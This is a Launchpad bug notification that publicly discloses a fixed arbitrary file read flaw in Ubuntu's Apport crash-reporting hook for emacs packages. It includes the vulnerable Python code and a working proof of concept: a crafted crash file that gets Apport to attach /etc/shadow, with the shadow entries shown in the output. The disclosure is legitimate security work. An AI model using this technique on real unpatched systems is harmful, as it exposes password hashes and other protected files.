[Bug 1934308] Re: Arbitrary file read in general hook (ubuntu.py)

Marc Deslauriers 1934308 at bugs.launchpad.net
Thu Sep 16 11:40:47 UTC 2021 

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1934308

Title:
  Arbitrary file read in general hook (ubuntu.py)

Status in apport package in Ubuntu:
  Fix Released

Bug description:
  While reviewing Apport's general hooks it was found that the hook
  `apport/general-hooks/ubuntu.py` includes user controlled files when
  handling `emacs`-related reports:

  if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
      # emacs add-on packages trigger byte compilation, which might fail
      # we are very interested in reading the compilation log to determine
      # where to reassign this report to
      regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
      if attachment in report and re.search(regex, log_file, re.MULTILINE):
          for line in log_file.split('\n'):
              m = re.search(r'^!! and attach the file (\S+)', line)  # [0]
              if m:
                  path = m.group(1)
                  apport.hookutils.attach_file_if_exists(report, path)  # [1]

  After using a regular expression to extract the file to attach [0],
  the extracted file subsequently gets attached to the report file [1].

  With automatic crash reporting enabled the following PoC (tested on
  20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective
  report file:

  cat << EOF > /var/crash/poc.crash
  ProblemType: Package
  ExecutablePath: /poc
  Package: emacs22
  DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
   !! and attach the file /etc/shadow
  EOF

  grep -A5 DpkgTerminal /var/crash/poc.crash
  DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
   !! and attach the file /etc/shadow
  .etc.shadow:
   root:!:18393:0:99999:7:::
   daemon:*:18375:0:99999:7:::
   bin:*:18375:0:99999:7:::

  Best regards!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1934308/+subscriptions

More information about the foundations-bugs mailing list